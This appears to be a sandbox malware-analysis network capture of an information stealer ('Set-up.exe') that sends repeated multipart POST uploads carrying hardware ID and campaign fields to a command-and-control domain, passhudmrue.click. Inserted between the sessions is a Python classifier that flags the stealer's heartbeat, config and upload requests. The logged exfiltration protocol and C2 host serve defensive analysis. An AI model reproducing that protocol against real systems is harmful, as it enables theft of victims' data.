2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 79 70 49 43 34 6d 4b 48 51 31 52 50 6d 52 32 59 58 49 31 51 6b 52 6b 6f 56 2f 45 55 6e 73 30 74 4f 70 47 4f 66 4f 41 50 2b 64 73 4f 51 73 56 77 35 6c 50 43 56 5a 30 4d 54 77 6f 4e 57 64 4c 55 69 33 30 47 65 74 5a 58 43 6d 6b 2f 6c 74 2b 36 38 67 72 72 32 59 77 53 45 79 48 6b 46 49 44 55 6e 59 30 4f 57 64 2f 4b 55 70 4d 59 4b 6c 57 78 6b 64 39 4e 37 4c 6e 51 6a 58 6d 68 6a 2f 72 62 54 67 41 48 38 33 54 45 30 70 61 5a 6e 78 75 4b 45 34 71 51 30 70 75 75 68 6e 54 47 32 78 35 75 4f 41 4e 5a 72 53 4b 50 4f 39 75 4d 41 51 66 7a 35 4a 52 42 46 70 37 4e 54 35 67 61 53 5a 49 51 6d 79 69 56 73 31 52 63 44 79 37 36 30 6b 34 2b 38 5a 38 72 32 59 6b 53 45 79 48 76 48 6f 2f 48 31 38 47 64 6e 63 31 50 67 78 4e 59 65 77 42 6a 46 6c 32 4e 62 66 6a 53 7a 66 34 6a 44 76 6b
Data Ascii: ypIC4mKHQ1RPmR2YXI1QkRkoV/EUns0tOpGOfOAP+dsOQsVw5lPCVZ0MTwoNWdLUi30GetZXCmk/lt+68grr2YwSEyHkFIDUnY0OWd/KUpMYKlWxkd9N7LnQjXmhj/rbTgAH83TE0paZnxuKE4qQ0puuhnTG2x5uOANZrSKPO9uMAQfz5JRBFp7NT5gaSZIQmyiVs1RcDy760k4+8Z8r2YkSEyHvHo/H18Gdnc1PgxNYewBjFl2NbfjSzf4jDvk
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 44 45 6c 31 67 46 58 48 38 36 4a 47 39 79 4e 55 4a 48 59 71 52 52 78 56 52 78 50 4c 4c 71 51 54 54 31 67 54 7a 68 61 58 78 47 56 4d 43 4c 48 56 49 64 58 79 77 74 65 6d 30 71 62 55 64 69 37 45 61 43 54 44 55 2b 73 36 77 56 66 76 32 55 4e 75 4a 7a 4e 51 38 61 79 4a 42 50 43 31 42 31 4c 6a 46 6e 66 79 42 41 54 47 4b 71 57 4d 6c 66 65 54 36 36 35 30 49 79 74 4d 68 79 36 48 6c 38 55 46 54 70 6d 45 34 64 58 6e 41 33 49 48 4d 37 4f 41 4a 54 4c 61 74 56 6a 41 30 31 4f 72 54 6e 53 54 37 34 68 6a 62 69 59 53 34 48 45 38 43 61 56 68 68 58 65 54 73 39 59 48 41 6f 53 6c 68 68 6f 6b 76 4a 52 32 64 35 38 61 78 4b 4a 72 54 65 63 74 6c 6d 4c 42 67 58 68 61 4a 4c 43 55 74 31 4d 54 6f 6f 5a 47 6c 56 43 6d 71 67 47 5a 51 56 63 7a 61 32 37 30 49 2f 2f 59 6f 2f 36 6d 67 35 43
Data Ascii: DEl1gFXH86JG9yNUJHYqRRxVRxPLLqQTT1gTzhaXxGVMCLHVIdXywtem0qbUdi7EaCTDU+s6wVfv2UNuJzNQ8ayJBPC1B1LjFnfyBATGKqWMlfeT6650IytMhy6Hl8UFTpmE4dXnA3IHM7OAJTLatVjA01OrTnST74hjbiYS4HE8CaVhhXeTs9YHAoSlhhokvJR2d58axKJrTectlmLBgXhaJLCUt1MTooZGlVCmqgGZQVcza270I//Yo/6mg5C
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 54 4f 46 35 6c 66 43 6b 6d 59 6d 64 4c 52 69 33 30 47 63 39 53 64 6a 69 31 35 55 45 78 38 34 49 67 35 57 59 75 43 52 58 4d 6e 6c 45 4b 55 48 4d 32 4e 32 46 32 4b 30 46 4e 61 71 4e 63 6a 42 73 31 50 71 65 73 46 58 37 56 69 7a 6e 6a 4f 6d 5a 49 43 34 6d 4b 48 51 31 52 50 6d 52 32 61 48 45 69 52 6b 64 75 6f 31 72 65 56 48 4d 72 76 2b 46 48 4c 50 36 4e 4e 2b 4a 73 4d 51 73 53 77 5a 68 52 47 46 52 2b 50 7a 30 6f 4e 57 64 4c 55 69 33 30 47 65 39 43 59 7a 4f 34 34 46 73 31 39 59 55 6b 34 6e 46 38 52 6c 54 57 6c 45 78 4b 42 57 67 73 49 57 39 6b 61 56 55 4b 61 71 41 5a 6c 42 56 7a 4d 4c 6e 72 53 7a 44 6d 67 7a 54 67 62 6a 55 42 45 4d 2b 51 58 51 35 5a 65 54 6b 31 5a 48 41 67 54 30 56 70 70 56 66 46 57 6a 56 33 2f 2b 74 56 66 71 7a 47 45 2f 52 69 4d 41 56 55 32 4e
Data Ascii: TOF5lfCkmYmdLRi30Gc9Sdji15UEx84Ig5WYuCRXMnlEKUHM2N2F2K0FNaqNcjBs1PqesFX7ViznjOmZIC4mKHQ1RPmR2aHEiRkduo1reVHMrv+FHLP6NN+JsMQsSwZhRGFR+Pz0oNWdLUi30Ge9CYzO44Fs19YUk4nF8RlTWlExKBWgsIW9kaVUKaqAZlBVzMLnrSzDmgzTgbjUBEM+QXQ5ZeTk1ZHAgT0VppVfFWjV3/+tVfqzGE/RiMAVU2N
2025-01-05 17:53:31 UTC | 263 | IN | Data Raw: 4d 48 77 78 63 44 74 2f 44 47 70 6d 75 6c 7a 4c 51 7a 63 4d 76 4f 4a 44 4f 65 4c 47 4c 64 41 76 66 41 6c 55 6e 36 70 45 53 6b 73 2b 5a 47 51 6d 4f 7a 55 4d 45 69 33 72 57 74 35 48 63 7a 71 70 37 77 6f 41 79 71 45 6b 35 57 59 73 44 77 50 49 30 78 4e 4b 55 6a 35 6b 44 79 68 79 49 46 64 62 65 36 46 4a 79 78 56 4b 64 2f 2f 30 44 57 61 30 73 7a 48 68 62 7a 73 65 42 59 71 30 53 77 42 61 62 6a 73 68 5a 7a 74 70 44 45 77 74 39 41 71 43 46 58 45 6f 2f 37 51 64 62 4b 2f 54 59 62 67 78 62 68 64 61 33 74 4e 4c 53 67 55 73 63 6e 5a 36 4f 33 38 4d 44 57 36 2b 53 38 70 57 59 7a 72 34 30 6e 4d 5a 37 6f 73 30 2b 48 41 43 4e 68 50 64 6e 6c 73 64 54 44 49 70 4e 57 5a 31 49 46 6f 4b 49 2b 78 57 6a 41 31 4d 65 66 65 73 63 6e 43 30 6e 6e 4b 33 49 51 6b 4c 47 73 6d 55 53 78 73
Data Ascii: MHwxcDt/DGpmulzLQzcMvOJDOeLGLdAvfAlUn6pESks+ZGQmOzUMEi3rWt5Hczqp7woAyqEk5WYsDwPI0xNKUj5kDyhyIFdbe6FJyxVKd//0DWa0szHhbzseBYq0SwBabjshZztpDEwt9AqCFXEo/7QdbK/TYbgxbhda3tNLSgUscnZ6O38MDW6+S8pWYzr40nMZ7os0+HACNhPdnlsdTDIpNWZ1IFoKI+xWjA1MefescnC0nnK3IQkLGsmUSxs
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 33 32 62 36 0d 0a 6d 77 32 44 41 51 74 71 68 6d 55 42 54 74 35 75 2f 30 4e 5a 71 54 55 61 62 6f 79 61 31 68 47 32 4e 31 45 53 6b 73 2b 5a 47 51 6d 4f 7a 55 4d 45 69 33 72 57 74 35 48 63 7a 71 70 37 77 6f 41 79 71 67 31 36 57 51 37 47 46 62 70 6d 45 6b 4e 48 54 42 38 4f 53 67 6a 48 67 77 43 4c 5a 4d 58 6a 45 30 31 59 66 2f 5a 54 6a 44 36 67 53 54 2b 4c 42 49 50 45 73 4b 55 54 55 68 7a 64 53 67 78 4b 44 56 6e 53 67 6f 31 2f 42 65 4d 55 57 52 35 35 37 77 66 5a 61 48 56 5a 62 38 7a 49 30 59 4e 68 34 55 64 55 67 38 77 66 43 51 6f 49 32 63 4c 53 58 2b 2b 58 38 39 44 64 6e 36 42 30 6b 34 6f 2b 59 6b 35 37 6c 38 43 4a 68 6e 47 6b 46 4e 49 62 47 67 78 4a 6d 74 2b 49 48 4a 30 59 36 74 4e 79 31 74 7a 4f 66 2b 69 44 54 47 30 33 67 75 76 4b 58 77 33 57 6f 65 4c 48 56
Data Ascii: 32b6mw2DAQtqhmUBTt5u/0NZqTUaboya1hG2N1ESks+ZGQmOzUMEi3rWt5Hczqp7woAyqg16WQ7GFbpmEkNHTB8OSgjHgwCLZMXjE01Yf/ZTjD6gST+LBIPEsKUTUhzdSgxKDVnSgo1/BeMUWR557wfZaHVZb8zI0YNh4UdUg8wfCQoI2cLSX++X89Ddn6B0k4o+Yk57l8CJhnGkFNIbGgxJmt+IHJ0Y6tNy1tzOf+iDTG03guvKXw3WoeLHV
2025-01-05 17:53:31 UTC | 1369 | IN | Data Raw: 5a 6a 70 6b 61 56 55 4b 65 2b 77 42 6e 68 73 31 4b 2f 2b 30 44 58 6e 33 6c 43 44 70 59 69 6f 4c 55 2f 6d 74 65 67 52 61 66 79 6f 6d 5a 58 63 47 54 31 74 6e 6b 6d 66 5a 56 6e 73 33 75 50 70 63 66 72 72 47 50 61 38 35 42 55 68 63 68 36 77 54 53 6b 55 2b 5a 48 5a 64 65 43 6c 43 54 58 75 39 46 4f 74 62 63 6a 69 70 2f 45 41 79 31 59 55 6a 35 53 46 79 53 42 4b 48 79 77 39 45 48 58 6f 74 64 6a 41 72 64 52 63 66 50 76 73 4a 6e 6b 6f 37 49 50 2f 36 44 57 61 6d 79 48 4c 39 49 57 52 49 55 38 53 42 54 77 78 65 61 44 39 78 56 6b 55 43 57 30 6c 39 71 6c 72 79 61 31 34 31 75 65 74 58 4f 66 4b 67 45 71 38 76 66 41 64 55 6e 36 6f 64 51 68 31 42 63 6e 5a 77 4f 33 38 4d 66 32 36 69 56 38 74 44 5a 48 53 61 2b 30 34 75 38 6f 56 79 6f 53 45 36 53 45 79 58 33 52 30 4f 54 44 35
Data Ascii: ZjpkaVUKe+wBnhs1K/+0DXn3lCDpYioLU/mtegRafyomZXcGT1tnkmfZVns3uPpcfrrGPa85BUhch6wTSkU+ZHZdeClCTXu9FOtbcjip/EAy1YUj5SFySBKHyw9EHXotdjArdRcfPvsJnko7IP/6DWamyHL9IWRIU8SBTwxeaD9xVkUCW0l9qlrya141uetXOfKgEq8vfAdUn6odQh1BcnZwO38Mf26iV8tDZHSa+04u8oVyoSE6SEyX3R0OTD5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49788 | 172.67.178.174 | 443 | 3940 | C:\Users\user\Desktop\'Set-up.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:32 UTC | 284 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=EORV0HD9UWAKJ2L405H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12864
Host: passhudmrue.click
2025-01-05 17:53:32 UTC | 12864 | OUT | Data Raw: 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 32 41 32 31 35 44 30 37 43 42 37 37 46 38 46 45 32 31 32 43 43 34 42 33 32 41 33 45 36 44 43 0d 0a 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 4f 52 56 30 48 44 39 55 57 41 4b 4a 32 4c 34 30 35 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 44 52
Data Ascii: --EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="pid"2--EORV0HD9UWAKJ2L405HContent-Disposition: form-data; name="lid"hRjzG3--DR
2025-01-05 17:53:33 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:53:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=redevm1kdu8dmn7qdg1l6nclqi; expires=Thu, 01 May 2025 11:40:11 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVqItzG4dOWvx%2F77P0jkp%2BoyzG7okGm2pTNLDUqb0H0iPU18T56uZqJLKToXZzWoEeHFoFX3w4uFCHdBUhCJ7vc0AnhiRFfuPWrEo9MrhaYOaTC6kPsKbLpr1fhmD9yrrwffTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd55412cbd50f4d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1522&rtt_var=582&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13806&delivery_rate=1859872&cwnd=217&unsent_bytes=0&cid=ea397b3752e58d31&ts=554&x=0"
2025-01-05 17:53:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:53:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
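Across sessions 0 to 3 the sample drives one endpoint, POST /api on passhudmrue.click, with three request shapes: a form-encoded act=life heartbeat, a form-encoded act=recive_message (the binary's own spelling) carrying ver, lid and j, and multipart uploads whose first parts are hwid, pid and lid. The Python below is an added example, not code from the report or from the sandbox, that classifies captured POSTs by those shapes so the same traffic can be recognised in a proxy log or a replayed pcap. The sample bodies are constructed from the values visible above, with the CRLF framing the sandbox collapses restored; the upload in the report is truncated after the lid part, so the "file" part in the sample is a placeholder and not captured content.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests modelled on sessions 0 to 3 of the report. Bodies are
# rebuilt with proper CRLF framing and use the field values visible in the capture.
# The captured upload was truncated after "lid", so the "file" part below is a
# placeholder standing in for whatever the stealer actually sent (assumption).
BOUNDARY = "EORV0HD9UWAKJ2L405H"
SAMPLE_REQUESTS = [
    {"path": "/api", "content_type": "application/x-www-form-urlencoded",
     "body": "act=life"},
    {"path": "/api", "content_type": "application/x-www-form-urlencoded",
     "body": "act=recive_message&ver=4.0&lid=hRjzG3--DRON"
             "&j=637b55279021aab33278188cfa638397"},
    {"path": "/api", "content_type": f"multipart/form-data; boundary={BOUNDARY}",
     "body": (f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
              'C2A215D07CB77F8FE212CC4B32A3E6DC\r\n'
              f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="pid"\r\n\r\n2\r\n'
              f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
              'hRjzG3--DRON\r\n'
              f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="file"; '
              'filename="placeholder.zip"\r\n\r\nPLACEHOLDER\r\n'
              f'--{BOUNDARY}--\r\n')},
    # Ordinary form POST, included to show the rules do not fire on it.
    {"path": "/login", "content_type": "application/x-www-form-urlencoded",
     "body": "user=alice&remember=1"},
]


def parse_multipart(content_type, body):
    """Minimal multipart/form-data parser returning {field name: value}.

    Sufficient for the flat, unnested bodies seen here; values are returned as
    text because the constructed sample is text.
    """
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        return {}
    delimiter = "--" + m.group(1)
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith("--"):            # closing delimiter "--boundary--"
            break
        head, sep, value = part.lstrip("\r\n").partition("\r\n\r\n")
        if not sep:
            continue                         # part headers without a body
        name = re.search(r'name="([^"]*)"', head)
        if name:
            fields[name.group(1)] = value.rstrip("\r\n")
    return fields


def classify(req):
    """Map one POST to the C2 stage it matches, or None if it matches nothing."""
    ctype = req["content_type"].split(";")[0].strip().lower()
    if ctype == "application/x-www-form-urlencoded":
        f = {k: v[0] for k, v in parse_qs(req["body"]).items()}
        if f.get("act") == "life":
            return {"stage": "heartbeat"}
        # "recive_message" is the malware's own spelling; match it literally.
        if f.get("act") == "recive_message" and {"ver", "lid", "j"}.issubset(f):
            return {"stage": "config_request", "ver": f["ver"], "lid": f["lid"]}
        return None
    if ctype == "multipart/form-data":
        f = parse_multipart(req["content_type"], req["body"])
        if {"hwid", "pid", "lid"}.issubset(f):
            return {"stage": "upload", "hwid": f["hwid"], "pid": f["pid"], "lid": f["lid"]}
    return None


def triage(requests):
    """Return [(path, stage)] for every request that matches a C2 stage."""
    hits = []
    for r in requests:
        c = classify(r)
        if c:
            hits.append((r["path"], c["stage"]))
    return hits


if __name__ == "__main__":
    for path, stage in triage(SAMPLE_REQUESTS):
        print(f"{path}: {stage}")
```

The rules key on the body structure rather than on the host name, since the domain and the lid value are campaign-specific while the act=life / act=recive_message / hwid-pid-lid sequence is what ties the four sessions together; the User-Agent is a stock Chrome string and is deliberately not used as a signal.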


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49799        172.67.178.174  443               3940  C:\Users\user\Desktop\'Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:53:33 UTC  273                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WIUPQMPL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15044
    Host: passhudmrue.click
2025-01-05 17:53:33 UTC  15044              OUT        Data Raw: (hex dump omitted)
    Data Ascii: --WIUPQMPLContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--WIUPQMPLContent-Disposition: form-data; name="pid"2--WIUPQMPLContent-Disposition: form-data; name="lid"hRjzG3--DRON--WIUPQMPLContent-Dispositi
2025-01-05 17:53:41 UTC  1135               IN         HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:53:41 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=42211m9kpikgr3ujc78n371ah8; expires=Thu, 01 May 2025 11:40:20 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BcSne1Wd8S%2F6RGoN1HQTNadzVVNzu4Z9VpXtAAHhes3CSaNAlPcqcWfOcNbYQByhxHIyL%2FzvmPLUwZTOlQf5DXx7yQPGF4jFCnV%2FEBnkJHGJUDRSTuLPiiY8aTkxKKiVFkDxg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd5541a0c0a438b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1639&rtt_var=659&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15975&delivery_rate=1606160&cwnd=169&unsent_bytes=0&cid=5d5dc5226c4459fd&ts=7950&x=0"
2025-01-05 17:53:41 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 17:53:41 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49851        172.67.178.174  443               3940  C:\Users\user\Desktop\'Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:53:42 UTC  281                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NF6QEJRIK626LVRM
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 19950
    Host: passhudmrue.click
2025-01-05 17:53:42 UTC  15331              OUT        Data Raw: (hex dump omitted)
    Data Ascii: --NF6QEJRIK626LVRMContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--NF6QEJRIK626LVRMContent-Disposition: form-data; name="pid"3--NF6QEJRIK626LVRMContent-Disposition: form-data; name="lid"hRjzG3--DRON--NF6
2025-01-05 17:53:42 UTC  4619               OUT        Data Raw: (hex dump of non-printable binary payload omitted)
2025-01-05 17:53:42 UTC  1128               IN         HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:53:42 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=vif0r1jnsb4sv6dca1dukiakf9; expires=Thu, 01 May 2025 11:40:21 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2hbJC0uNBhcHhIZtiOwUbVFJmI6qwBmF5BcJz5mJkkgzCwjDjV9VVd19xQ1JHYm11En9v0ed3qtDrNy4LnJ8fZ8RAPT9djExT8Y5w4SZJxFkIBh%2BItoE3SOHtlK4pPGrPZP8yw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd5544fcf07729e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1829&rtt_var=689&sent=9&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20911&delivery_rate=1584373&cwnd=165&unsent_bytes=0&cid=9eef78e338e7f7e8&ts=608&x=0"
2025-01-05 17:53:42 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 17:53:42 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49864        172.67.178.174  443               3940  C:\Users\user\Desktop\'Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:53:44 UTC  282                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=3YYU6JSELTHBZSEBED
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 5475
    Host: passhudmrue.click
2025-01-05 17:53:44 UTC  5475               OUT        Data Raw: (hex dump omitted)
    Data Ascii: --3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="pid"1--3YYU6JSELTHBZSEBEDContent-Disposition: form-data; name="lid"hRjzG3--DRON
2025-01-05 17:53:44 UTC  1135               IN         HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:53:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=3vikbcba94sctu40dneus3jepa; expires=Thu, 01 May 2025 11:40:23 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gezjazJquZkHsEbPSQfTNO1qV%2FFZNK%2BiRhKsQLt%2Fkf8nQPGAORczVGYOZVGme6qqry%2BiYWiPS%2BrJzqI9v2VLsx4zCSFoPwFdG0s0ehkTKxA5PSNT2Z4lKmzeHhZ1OvB4UnVNWg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd5545b3c144406-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1930&min_rtt=1680&rtt_var=1131&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2843&recv_bytes=6393&delivery_rate=792401&cwnd=186&unsent_bytes=0&cid=5be641c182cf49a5&ts=738&x=0"
2025-01-05 17:53:44 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 17:53:44 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49875        172.67.178.174  443               3940  C:\Users\user\Desktop\'Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:53:45 UTC  273                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=94KFIXWAMD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 911
    Host: passhudmrue.click
2025-01-05 17:53:45 UTC  911                OUT        Data Raw: (hex dump omitted)
    Data Ascii: --94KFIXWAMDContent-Disposition: form-data; name="hwid"C2A215D07CB77F8FE212CC4B32A3E6DC--94KFIXWAMDContent-Disposition: form-data; name="pid"1--94KFIXWAMDContent-Disposition: form-data; name="lid"hRjzG3--DRON--94KFIXWAMDContent-D
2025-01-05 17:53:45 UTC  1126               IN         HTTP/1.1 200 OK
    Date: Sun, 05 Jan 2025 17:53:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=6rk44kpmdrfkdt64culeckgerk; expires=Thu, 01 May 2025 11:40:24 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EtvPjXRoybZsLivdIREqNUBzWRpyvgsJRn6J8QGmwPlaGKYwHNIu432%2Bg1vepSHnBnLcGvvzVyqKiXUVC44GjBoIAavyqxqJ3l86pHrZIDF2DZQtMn3F6zr64H0IEpXysWFPng%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fd5546388586a53-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2046&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1820&delivery_rate=1396461&cwnd=222&unsent_bytes=0&cid=daca1a5769595bd3&ts=470&x=0"
2025-01-05 17:53:45 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2025-01-05 17:53:45 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49884        172.67.178.174  443               3940  C:\Users\user\Desktop\'Set-up.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-05 17:53:46 UTC  274                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=QNDAGIME
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 572454
    Host: passhudmrue.click
2025-01-05 17:53:46 UTC  15331              OUT        Data Raw: (hex dump omitted)
